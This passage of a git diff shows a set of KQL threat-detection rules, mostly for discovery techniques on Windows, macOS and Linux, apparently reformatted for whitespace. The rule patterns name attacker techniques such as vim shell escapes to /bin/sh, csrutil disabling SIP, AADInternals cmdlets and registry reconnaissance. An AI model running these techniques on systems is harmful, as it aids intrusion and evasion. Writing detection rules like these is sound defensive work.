information. -// This process is used for system information discovery. -// It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1082 -// False Positives: -// - Legitimate administrative activities - -DeviceProcessEvents +// Title: System Information Discovery Using Ioreg +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-12-20 +// Level: medium +// Description: Detects the use of "ioreg" which will show I/O Kit registry information. +// This process is used for system information discovery. +// It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 +// False Positives: +// - Legitimate administrative activities + +DeviceProcessEvents | where (ProcessCommandLine contains "-l" or ProcessCommandLine contains "-c") and (ProcessCommandLine contains "AppleAHCIDiskDriver" or ProcessCommandLine contains "IOPlatformExpertDevice" or ProcessCommandLine contains "Oracle" or ProcessCommandLine contains "Parallels" or ProcessCommandLine contains "USB Vendor Name" or ProcessCommandLine contains "VirtualBox" or ProcessCommandLine contains "VMware") and (FolderPath endswith "/ioreg" or ProcessCommandLine contains "ioreg") \ No newline at end of file diff --git a/KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql b/KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql index 15533619..5f7cee88 100644 --- a/KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql +++ b/KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql @@ -1,12 +1,12 @@ -// Title: System Information Discovery Using sw_vers -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-12-20 -// Level: medium -// Description: Detects the use of "sw_vers" for system information discovery -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1082 -// False Positives: -// - Legitimate administrative activities - -DeviceProcessEvents +// Title: System Information Discovery Using sw_vers +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-12-20 +// Level: medium +// Description: Detects the use of "sw_vers" for system information discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 +// False Positives: +// - Legitimate administrative activities + +DeviceProcessEvents | where FolderPath endswith "/sw_vers" and (ProcessCommandLine contains "-buildVersion" or ProcessCommandLine contains "-productName" or ProcessCommandLine contains "-productVersion") \ No newline at end of file diff --git a/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql b/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql index 2cdc3098..b8bc28ec 100644 --- a/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql +++ b/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql @@ -1,13 +1,13 @@ -// Title: System Information Discovery Using System_Profiler -// Author: Stephen Lincoln `@slincoln_aiq` (AttackIQ) -// Date: 2024-01-02 -// Level: medium -// Description: Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. -// This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.defense-evasion, attack.t1082, attack.t1497.001 -// False Positives: -// - Legitimate administrative activities - -DeviceProcessEvents +// Title: System Information Discovery Using System_Profiler +// Author: Stephen Lincoln `@slincoln_aiq` (AttackIQ) +// Date: 2024-01-02 +// Level: medium +// Description: Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. +// This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.defense-evasion, attack.t1082, attack.t1497.001 +// False Positives: +// - Legitimate administrative activities + +DeviceProcessEvents | where (ProcessCommandLine contains "SPApplicationsDataType" or ProcessCommandLine contains "SPHardwareDataType" or ProcessCommandLine contains "SPNetworkDataType" or ProcessCommandLine contains "SPUSBDataType") and (FolderPath endswith "/system_profiler" or ProcessCommandLine contains "system_profiler") \ No newline at end of file diff --git a/KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql b/KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql index 70672c0e..cd3d4b91 100644 --- a/KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql +++ b/KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql @@ -1,12 +1,12 @@ -// Title: System Information Discovery via Registry Queries -// Author: lazarg -// Date: 2025-06-12 -// Level: low -// Description: Detects attempts to query system information directly from the Windows Registry. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1082 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: System Information Discovery via Registry Queries +// Author: lazarg +// Date: 2025-06-12 +// Level: low +// Description: Detects attempts to query system information directly from the Windows Registry. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (((ProcessCommandLine contains "Get-ItemPropertyValue" or ProcessCommandLine contains "gpv") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "query" and (ProcessCommandLine contains "-v" or ProcessCommandLine contains "/v" or ProcessCommandLine contains "–v" or ProcessCommandLine contains "—v" or ProcessCommandLine contains "―v") and FolderPath endswith "\\reg.exe")) and (ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows Defender" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Services" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks") \ No newline at end of file diff --git a/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql b/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql index 3ef42ec5..5166b100 100644 --- a/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql +++ b/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql @@ -1,10 +1,10 @@ -// Title: System Integrity Protection (SIP) Disabled -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2024-01-02 -// Level: medium -// Description: Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1518.001 - -DeviceProcessEvents +// Title: System Integrity Protection (SIP) Disabled +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2024-01-02 +// Level: medium +// Description: Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1518.001 + +DeviceProcessEvents | where ProcessCommandLine contains "disable" and FolderPath endswith "/csrutil" \ No newline at end of file diff --git a/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql b/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql index 400f1fad..06cdc475 100644 --- a/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql +++ b/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql @@ -1,12 +1,12 @@ -// Title: System Integrity Protection (SIP) Enumeration -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2024-01-02 -// Level: low -// Description: Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1518.001 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: System Integrity Protection (SIP) Enumeration +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2024-01-02 +// Level: low +// Description: Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1518.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ProcessCommandLine contains "status" and FolderPath endswith "/csrutil" \ No newline at end of file diff --git a/KQL/rules/Discovery/system_network_connections_discovery_linux.kql b/KQL/rules/Discovery/system_network_connections_discovery_linux.kql index 1847f896..d96b0811 100644 --- a/KQL/rules/Discovery/system_network_connections_discovery_linux.kql +++ b/KQL/rules/Discovery/system_network_connections_discovery_linux.kql @@ -1,12 +1,12 @@ -// Title: System Network Connections Discovery - Linux -// Author: Daniil Yugoslavskiy, oscd.community -// Date: 2020-10-19 -// Level: low -// Description: Detects usage of system utilities to discover system network connections -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1049 -// False Positives: -// - Legitimate activities - -DeviceProcessEvents +// Title: System Network Connections Discovery - Linux +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: low +// Description: Detects usage of system utilities to discover system network connections +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1049 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents | where (FolderPath endswith "/who" or FolderPath endswith "/w" or FolderPath endswith "/last" or FolderPath endswith "/lsof" or FolderPath endswith "/netstat") and (not((FolderPath endswith "/who" and InitiatingProcessCommandLine contains "/usr/bin/landscape-sysinfo"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/system_network_connections_discovery_macos.kql b/KQL/rules/Discovery/system_network_connections_discovery_macos.kql index fbd98d19..d47ce49d 100644 --- a/KQL/rules/Discovery/system_network_connections_discovery_macos.kql +++ b/KQL/rules/Discovery/system_network_connections_discovery_macos.kql @@ -1,12 +1,12 @@ -// Title: System Network Connections Discovery - MacOs -// Author: Daniil Yugoslavskiy, oscd.community -// Date: 2020-10-19 -// Level: informational -// Description: Detects usage of system utilities to discover system network connections -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1049 -// False Positives: -// - Legitimate activities - -DeviceProcessEvents +// Title: System Network Connections Discovery - MacOs +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: informational +// Description: Detects usage of system utilities to discover system network connections +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1049 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents | where FolderPath endswith "/who" or FolderPath endswith "/w" or FolderPath endswith "/last" or FolderPath endswith "/lsof" or FolderPath endswith "/netstat" \ No newline at end of file diff --git a/KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql b/KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql index 563ac286..03433c29 100644 --- a/KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql +++ b/KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql @@ -1,10 +1,10 @@ -// Title: System Network Connections Discovery Via Net.EXE -// Author: frack113 -// Date: 2021-12-10 -// Level: low -// Description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1049 - -DeviceProcessEvents +// Title: System Network Connections Discovery Via Net.EXE +// Author: frack113 +// Date: 2021-12-10 +// Level: low +// Description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1049 + +DeviceProcessEvents | where ((ProcessCommandLine endswith " use" or ProcessCommandLine endswith " sessions") or (ProcessCommandLine contains " use " or ProcessCommandLine contains " sessions ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/system_network_discovery_linux.kql b/KQL/rules/Discovery/system_network_discovery_linux.kql index 0ea2b4b4..1591d667 100644 --- a/KQL/rules/Discovery/system_network_discovery_linux.kql +++ b/KQL/rules/Discovery/system_network_discovery_linux.kql @@ -1,12 +1,12 @@ -// Title: System Network Discovery - Linux -// Author: Ömer Günal and remotephone, oscd.community -// Date: 2020-10-06 -// Level: informational -// Description: Detects enumeration of local network configuration -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1016 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: System Network Discovery - Linux +// Author: Ömer Günal and remotephone, oscd.community +// Date: 2020-10-06 +// Level: informational +// Description: Detects enumeration of local network configuration +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1016 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ProcessCommandLine contains "/etc/resolv.conf" or (FolderPath endswith "/firewall-cmd" or FolderPath endswith "/ufw" or FolderPath endswith "/iptables" or FolderPath endswith "/netstat" or FolderPath endswith "/ss" or FolderPath endswith "/ip" or FolderPath endswith "/ifconfig" or FolderPath endswith "/systemd-resolve" or FolderPath endswith "/route") \ No newline at end of file diff --git a/KQL/rules/Discovery/system_network_discovery_macos.kql b/KQL/rules/Discovery/system_network_discovery_macos.kql index acb8edf8..85bcf7b1 100644 --- a/KQL/rules/Discovery/system_network_discovery_macos.kql +++ b/KQL/rules/Discovery/system_network_discovery_macos.kql @@ -1,12 +1,12 @@ -// Title: System Network Discovery - macOS -// Author: remotephone, oscd.community -// Date: 2020-10-06 -// Level: informational -// Description: Detects enumeration of local network configuration -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1016 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: System Network Discovery - macOS +// Author: remotephone, oscd.community +// Date: 2020-10-06 +// Level: informational +// Description: Detects enumeration of local network configuration +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1016 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ((FolderPath endswith "/arp" or FolderPath endswith "/ifconfig" or FolderPath endswith "/netstat" or FolderPath endswith "/networksetup" or FolderPath endswith "/socketfilterfw") or ((ProcessCommandLine contains "/Library/Preferences/com.apple.alf" and ProcessCommandLine contains "read") and FolderPath =~ "/usr/bin/defaults")) and (not(InitiatingProcessFolderPath endswith "/wifivelocityd")) \ No newline at end of file diff --git a/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql b/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql index f68dcd15..fa897cb6 100644 --- a/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql +++ b/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql @@ -1,12 +1,12 @@ -// Title: Uncommon Connection to Active Directory Web Services -// Author: @kostastsale -// Date: 2024-01-26 -// Level: medium -// Description: Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1087 -// False Positives: -// - ADWS is used by a number of legitimate applications that need to interact with Active Directory. These applications should be added to the allow-listing to avoid false positives. - -DeviceNetworkEvents +// Title: Uncommon Connection to Active Directory Web Services +// Author: @kostastsale +// Date: 2024-01-26 +// Level: medium +// Description: Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087 +// False Positives: +// - ADWS is used by a number of legitimate applications that need to interact with Active Directory. These applications should be added to the allow-listing to avoid false positives. + +DeviceNetworkEvents | where RemotePort == 9389 and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\dsac.exe" or InitiatingProcessFolderPath =~ "C:\\Program Files\\Microsoft Monitoring Agent\\" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.ex" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\WindowsPowerShell\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\")))) \ No newline at end of file diff --git a/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql b/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql index ca8c4e76..a0645f69 100644 --- a/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql +++ b/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql @@ -1,13 +1,13 @@ -// Title: Uncommon System Information Discovery Via Wmic.EXE -// Author: TropChaud -// Date: 2023-01-26 -// Level: medium -// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, -// including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, -// and GPU driver products/versions. -// Some of these commands were used by Aurora Stealer in late 2022/early 2023. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1082 - -DeviceProcessEvents +// Title: Uncommon System Information Discovery Via Wmic.EXE +// Author: TropChaud +// Date: 2023-01-26 +// Level: medium +// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, +// including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, +// and GPU driver products/versions. +// Some of these commands were used by Aurora Stealer in late 2022/early 2023. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 + +DeviceProcessEvents | where (ProcessCommandLine contains "LOGICALDISK get Name,Size,FreeSpace" or ProcessCommandLine contains "os get Caption,OSArchitecture,Version") and (ProcessVersionInfoFileDescription =~ "WMI Commandline Utility" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/use_of_w32tm_as_timer.kql b/KQL/rules/Discovery/use_of_w32tm_as_timer.kql index 8c26bd44..bbc2164c 100644 --- a/KQL/rules/Discovery/use_of_w32tm_as_timer.kql +++ b/KQL/rules/Discovery/use_of_w32tm_as_timer.kql @@ -1,12 +1,12 @@ -// Title: Use of W32tm as Timer -// Author: frack113 -// Date: 2022-09-25 -// Level: high -// Description: When configured with suitable command line arguments, w32tm can act as a delay mechanism -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1124 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: Use of W32tm as Timer +// Author: frack113 +// Date: 2022-09-25 +// Level: high +// Description: When configured with suitable command line arguments, w32tm can act as a delay mechanism +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1124 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where (ProcessCommandLine contains "/stripchart" and ProcessCommandLine contains "/computer:" and ProcessCommandLine contains "/period:" and ProcessCommandLine contains "/dataonly" and ProcessCommandLine contains "/samples:") and (FolderPath endswith "\\w32tm.exe" or ProcessVersionInfoOriginalFileName =~ "w32time.dll") \ No newline at end of file diff --git a/KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql b/KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql index 839b5d76..c5f6fa7c 100644 --- a/KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql +++ b/KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql @@ -1,12 +1,12 @@ -// Title: User Discovery And Export Via Get-ADUser Cmdlet -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-09 -// Level: medium -// Description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1033 -// False Positives: -// - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often - -DeviceProcessEvents +// Title: User Discovery And Export Via Get-ADUser Cmdlet +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-09 +// Level: medium +// Description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033 +// False Positives: +// - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often + +DeviceProcessEvents | where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADUser " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql b/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql index f0532d8f..62f7be84 100644 --- a/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql +++ b/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql @@ -1,11 +1,11 @@ -// Title: Vim GTFOBin Abuse - Linux -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-28 -// Level: high -// Description: Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands. -// Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1083 - -DeviceProcessEvents +// Title: Vim GTFOBin Abuse - Linux +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-28 +// Level: high +// Description: Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands. +// Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 + +DeviceProcessEvents | where (ProcessCommandLine contains ":!/" or ProcessCommandLine contains ":lua " or ProcessCommandLine contains ":py " or ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and ((ProcessCommandLine contains " --cmd" or ProcessCommandLine contains " -c ") and (FolderPath endswith "/rvim" or FolderPath endswith "/vim" or FolderPath endswith "/vimdiff")) \ No newline at end of file diff --git a/KQL/rules/Discovery/whoami_as_parameter.kql b/KQL/rules/Discovery/whoami_as_parameter.kql index 5f1484b0..7db1a91e 100644 --- a/KQL/rules/Discovery/whoami_as_parameter.kql +++ b/KQL/rules/Discovery/whoami_as_parameter.kql @@ -1,10 +1,10 @@ -// Title: WhoAmI as Parameter -// Author: Florian Roth (Nextron Systems) -// Date: 2021-11-29 -// Level: high -// Description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato) -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1033, car.2016-03-001 - -DeviceProcessEvents +// Title: WhoAmI as Parameter +// Author: Florian Roth (Nextron Systems) +// Date: 2021-11-29 +// Level: high +// Description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato) +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033, car.2016-03-001 + +DeviceProcessEvents | where ProcessCommandLine contains ".exe whoami" \ No newline at end of file diff --git a/KQL/rules/Discovery/whoami_exe_execution_anomaly.kql b/KQL/rules/Discovery/whoami_exe_execution_anomaly.kql index 16cf3b82..4f760137 100644 --- a/KQL/rules/Discovery/whoami_exe_execution_anomaly.kql +++ b/KQL/rules/Discovery/whoami_exe_execution_anomaly.kql @@ -1,14 +1,14 @@ -// Title: Whoami.EXE Execution Anomaly -// Author: Florian Roth (Nextron Systems) -// Date: 2021-08-12 -// Level: medium -// Description: Detects the execution of whoami.exe with suspicious parent processes. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1033, car.2016-03-001 -// False Positives: -// - Admin activity -// - Scripts and administrative tools used in the monitored environment -// - Monitoring activity - -DeviceProcessEvents +// Title: Whoami.EXE Execution Anomaly +// Author: Florian Roth (Nextron Systems) +// Date: 2021-08-12 +// Level: medium +// Description: Detects the execution of whoami.exe with suspicious parent processes. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033, car.2016-03-001 +// False Positives: +// - Admin activity +// - Scripts and administrative tools used in the monitored environment +// - Monitoring activity + +DeviceProcessEvents | where (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") and (not(((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") or (InitiatingProcessFolderPath in~ ("", "-")) or isnull(InitiatingProcessFolderPath)))) and (not(InitiatingProcessFolderPath endswith ":\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe")) \ No newline at end of file diff --git a/KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql b/KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql index e765acfc..39356810 100644 --- a/KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql +++ b/KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql @@ -1,10 +1,10 @@ -// Title: Whoami.EXE Execution With Output Option -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-28 -// Level: medium -// Description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1033, car.2016-03-001 - -DeviceProcessEvents +// Title: Whoami.EXE Execution With Output Option +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-28 +// Level: medium +// Description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033, car.2016-03-001 + +DeviceProcessEvents | where ((ProcessCommandLine contains " /FO CSV" or ProcessCommandLine contains " -FO CSV") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")) or ProcessCommandLine =~ "*whoami*>*" \ No newline at end of file diff --git a/KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql b/KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql index dbd6c8f4..2c8d2c8b 100644 --- a/KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql +++ b/KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql @@ -1,12 +1,12 @@ -// Title: AADInternals PowerShell Cmdlets Execution - ProccessCreation -// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2022-12-23 -// Level: high -// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential-access, attack.impact -// False Positives: -// - Legitimate use of the library for administrative activity - -DeviceProcessEvents +// Title: AADInternals PowerShell Cmdlets Execution - ProccessCreation +// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2022-12-23 +// Level: high +// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential-access, attack.impact +// False Positives: +// - Legitimate use of the library for administrative activity + +DeviceProcessEvents | where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Find-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Initialize-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Reset-AADInt" or ProcessCommandLine contains "Resolve-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Save-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Unprotect-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql b/KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql index b0057dbd..a98f0e08 100644 --- a/KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql +++ b/KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql @@ -1,10 +1,10 @@ -// Title: Abusable DLL Potential Sideloading From Suspicious Location -// Author: X__Junior (Nextron Systems) -// Date: 2023-07-11 -// Level: high -// Description: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceImageLoadEvents +// Title: Abusable DLL Potential Sideloading From Suspicious Location +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-11 +// Level: high +// Description: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + 